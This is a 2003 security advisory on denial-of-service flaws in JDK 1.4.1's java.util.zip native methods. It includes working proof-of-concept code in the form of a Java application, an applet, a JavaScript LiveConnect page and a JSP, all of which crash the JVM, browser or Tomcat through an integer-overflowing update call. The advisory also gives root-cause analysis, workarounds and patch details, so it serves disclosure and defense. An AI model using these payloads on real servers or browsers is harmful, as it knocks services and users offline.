16th Mar 2003 [SBWID-6070]
COMMAND
JDK Denial-Of-Service holes
SYSTEMS AFFECTED
JDK 1.4.1_01
PROBLEM
In Marc Schoenefeld Security Alert :
http://www.illegalaccess.org
Several Java distributions (like the popular JDK 1.4.1 JRE from Sun)
have been found to contain several locally Denial of Service
vulnerabilities in java.util.zip.* system-classes exploitable by
malicious applets and applications
Several Java distributions (like the popular JDK 1.4.1 JRE from Sun)
have been found to contain a locally exploitable Denial of Service. The
problem appears difficult to exploit, but hackers have a history of
discovering and releasing exploit code for exploitable flaws. The
techniques described here have been presented at the Blackhat Windows
Security 2003 conference. The following threats appear on the whole
range where java technology is present:
A malicious user or an attacker could insert the described exploitable
API code to force JVM crashes in the ISPs runtime environment. This
will cause outage of the JSP / servlet service the JVM is running for.
This has been tested with Tomcat 4.1.18 with security options turned
on. There is not only a threat for server-based services, furthermore a
malicious applet containing the code exploiting the vulnerable classes
could crash browser software like Internet Explorer, Netscape
Navigator, Lotus Notes that have Java functionality enabled. Analysis:
Java DK 1.4.1 has entry points to native libraries. These entry points
can be called with parameters (java simple types or objects). If an
object value is set to null and the native routine does not provide
appropriate check for null values, the JVM reaches an undefined state
and typically ends of in a JVM crash. The following proof of concept
code describes the problem stated above. If you are interested for
details about JVM security see the presentation of Marc Schoenefeld at
Blackhat USA 2002 and LSD-PL at Blackhat Asia 2002. In this specific
case there seems to a protection against buffer underflow in the
vulnerable classes, which can be disabled by a special combination of
the accompanying parameters, which cause via an underflow condition. If
the injected buffer can be used for shell code injection is still under
investigation.
This vulnerabilities can be exploited in the following scenarios if the
vulnerable method is called
in a java application, there is low to medium risk, because attacker
normally needs access to local file system, the risk if classes are
loaded dynamically from the network and the jar-files are infected with
the exploit in a java servlet or java server page, there is medium to
high risk, because attacker normally needs access to the webroot
directory. After injecting an infected servlet/server page , the
attacker calls it via http and the servlet engine (tested with tomcat
4.1.18) dies with an JVM crash. Unfortunately the -security parameter
has no effect, because java.util.zip.CRC32 is a trusted class. in a
java servlet, there is high risk, resulting in a denial-of-service of
the browser software. This has been tested with several browsers and
JDKs plugged in on W32 and Linux, including popular platforms like
Internet Explorer 5/6, Mozilla and Konqueror browser utilizing Java
Plugins like the current JRE 1.4.1 or JRE 1.3.1.
D:\entw\java\blackhat\crash>java -classpath . CRCCrash.java
Result
An unexpected exception has been detected in native code outside the
VM.
Unexpected Signal : EXCEPTION_ACCESS_VIOLATION occurred at
PC=3D0x6D3220A4
Function=3DJava_java_util_zip_ZipEntry_initFields+0x288
Library=3DC:\Programme\Java\j2re1.4.1_01\bin\zip.dll
Current Java thread:
at java.util.zip.CRC32.updateBytes(Native Method)
at java.util.zip.CRC32.update(CRC32.java:53)
at CRCCrash.main(CRCCrash.java:3)
Dynamic libraries:
0x00400000 - 0x00406000 C:\WINDOWS\system32\java.exe
0x77F40000 - 0x77FEE000 C:\WINDOWS\System32\ntdll.dll
0x77E40000 - 0x77F38000 C:\WINDOWS\system32\kernel32.dll
0x77DA0000 - 0x77E3C000 C:\WINDOWS\system32\ADVAPI32.dll
0x78000000 - 0x78086000 C:\WINDOWS\system32\RPCRT4.dll
0x77BE0000 - 0x77C33000 C:\WINDOWS\system32\MSVCRT.dll
0x6D330000 - 0x6D45A000
C:\Programme\Java\j2re1.4.1_01\bin\client\jvm.dll
0x77D10000 - 0x77D9C000 C:\WINDOWS\system32\USER32.dll
0x77C40000 - 0x77C80000 C:\WINDOWS\system32\GDI32.dll
0x76AF0000 - 0x76B1D000 C:\WINDOWS\system32\WINMM.dll
0x76330000 - 0x7634C000 C:\WINDOWS\System32\IMM32.DLL
0x6D1D0000 - 0x6D1D7000 C:\Programme\Java\j2re1.4.1_01\bin\hpi.dll
0x6D300000 - 0x6D30D000 C:\Programme\Java\j2re1.4.1_01\bin\verify.dll
0x6D210000 - 0x6D229000 C:\Programme\Java\j2re1.4.1_01\bin\java.dll
0x6D320000 - 0x6D32D000 C:\Programme\Java\j2re1.4.1_01\bin\zip.dll
0x76C50000 - 0x76C72000 C:\WINDOWS\system32\imagehlp.dll
0x6DA00000 - 0x6DA7D000 C:\WINDOWS\system32\DBGHELP.dll
0x77BD0000 - 0x77BD7000 C:\WINDOWS\system32\VERSION.dll
0x76BB0000 - 0x76BBB000 C:\WINDOWS\system32\PSAPI.DLL
Local Time =3D Mon Feb 03 12:15:38 2003
Elapsed Time =3D 0
#
# The exception above was detected in native code outside the VM
#
# Java VM: Java HotSpot(TM) Client VM (1.4.1_01-b01 mixed mode)
#
Figure 1: JVM Crash, Sample Exploit Application
This application has been successfully tested harmful with Sun JDK
1.3.1, 1.4.0, 1.4.1, IBM JDK 1.3.1 on several tested platforms
including W32, Linux, Solaris and AIX. As this exploit affects trusted
system libs it is likely that J2EE application servers and JMX runtime
components are also affected.
If non-desktop related java environments like the embedded solutions
frameworks (MIDP) for devices like cellular phones is affected is still
under investigation.
public class CRCCrash {
public static void main(String[] args) {
(new java.util.zip.CRC32()).update(new byte[0] ,4 ,
Integer.MAX_VALUE-3);
}
}
Figure 1: JVM Crash, Sample Exploit Applet
This applet has been successfully tested harmful with IE6, IE5,
Mozilla, Konqueror, but it is expected that other java based browsers
and systems with embedding browsers with java functionality like Lotus
Notes, Outlook, etc. are also vulnerable because the exploitable
component is the underlying JDK (see above).
/**
* Describe class <code>CRC32CrashApplet</code> here.
*
* @author <a href=3D"mailto:[email protected]">Marc Schoenefeld</a>
* @version 1.0
*/
public class CRC32CrashApplet extends java.applet.Applet {
public void paint(java.awt.Graphics g)
{
java.util.zip.CRC32 crc =3D new java.util.zip.CRC32();
crc.update(new byte[0],4,Integer.MAX_VALUE-3);
g.drawString("Crash the browser!", 20, 90);
}
}
Figure 2: CRCCrash.java, Sample Exploit Applet This applet has been
successfully tested harmful with IE6, IE5, Mozilla, Konqueror, but it
is expected that other java based browsers and systems with embedding
browsers with java functionality like Lotus Notes, Outlook, etc. are
also vulnerable because the exploitable component is the underlying JDK
(see above).
/**
* Describe class <code>CRC32CrashApplet</code> here.
*
* @author <a href=3D"mailto:[email protected]">Marc Schoenefeld</a>
* @version 1.0
*/
public class CRC32CrashApplet extends java.applet.Applet {
public void paint(java.awt.Graphics g)
{
java.util.zip.CRC32 crc =3D new java.util.zip.CRC32();
crc.update(new byte[0],4,Integer.MAX_VALUE-3);
g.drawString("Crash the browser!", 20, 90);
}
}
Figure 3: CRC32CrashApplet.java, Sample Exploit Liveconnect page
<html> <body> <script language=3Djavascript>
b=3Djava.lang.String("");c=3Db.getBytes();a=3Dnew
java.util.zip.Adler32();a.update(c,4, 0x7ffffffc); </script>
</body> </html>
Figure 4: CRC32Crash.html, Sample Exploit Java Server Page
This server page has been tested with Apache Jakarta Tomcat 4.1.18, but
it is expected that other servlet engines like Websphere, JRun are also
vulnerable because the exploitable component is the underlying JDK (see
above).
<%@pagecontentType=3D"text/html;charset=3DWINDOWS-1252"
import=3D"java.util.zip.*"%>
<% %>
<%! %>
<% (new CRC32()).update(new byte[0],4,Integer.MAX_VALUE-3); %>
<html>
<head>
<title>Crash-JSP mit java.util.zip.CRC32.update</title>
</head>
<body>
<hr>
<h1>Crash-JSP mit sun.misc.MessageUtils.toStderr(null)</h1>
<h2> Marc Schoenefeld , [email protected] </h2>
</body>
</html>
Figure 5: CRC32CrashApplet.jsp, Affected methods and classes
java.util.zip.Adler32().update(=85);
java.util.zip.Deflater().setDictionary(=85);
java.util.zip.CRC32().update(=85);
java.util.zip.Deflater().deflate(=85);
java.util.zip.CheckedOutputStream().write(=85);
java.util.zip.CheckedInputStream().read(=85);
Detection:
==========
Scan the importes of the (if self-written) classes of your java
applications (especially if downloaded from remote sites) if they call
into the affected methods.
Analysis:
=========
CRC32 has native calls in the following methods:
private native static int update(int adler, int b);
private native static int updateBytes(int adler, byte[] b, int off,int len);
It was detected to be that the source of all vulnerabilites are
inadequate range checks which then lead to integer overflows. The CRC32
functions that guard the native call to zip.dll seems to be coded
somehow like the following:
public class CRC32 [...] {
[...]
public void update(byte[] buff, int offset, int lenny) {
if (buff =3D=3D null)
{
throw new NullPointerException();
}
if (offset < 0 || lenni < 0 || offset + lenny > buff.length)
{
throw new ArrayIndexOutOfBoundsException();
} adler =3D updateBytes(adler, b, offset, lenny);
}
the buffer has to be non-null, therefore the exploit uses byte[0]
if offset < 0 the call is rejected
if lenny< 0 the call is rejected
If offset + lenny is larger than buff.length the call is rejected
To exploit the vulnerability a situation must be created where
offset + lenny =3D< buff.length AND offset >=3D 0 AND lenny >=3D0
which is in our example given for
x =3D 4 :
offset =3D x AND length =3D Integer.MAX_VALUE - x + buff.length+1
SOLUTION
Workaround:
===========
Disable Java , or if this is not possible
Do not download java applet from untrusted sources Ask your JRE/JDK
vendor (Sun, IBM, =85) for a security update Patch Available
The vulnerabilities described here are no longer present in JDK
1.4.1_02. The present JDK 1.3.1_07 is still affected. A patch for IBM
JDK is not known.
History
=======
The bugs have been reported to the official java bug database on Feb
03, 2003 and have been considered to be new, their URLs in the bug
database are
http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
http://developer.java.sun.com/developer/bugParade/bugs/4811917.html
Further Information
===================
An extended version of this report with a summary about native
method vulnerabilites can be downloaded from IDefense.com.
Contributor
===========
Marc Schoenefeld , www.illegalaccess.org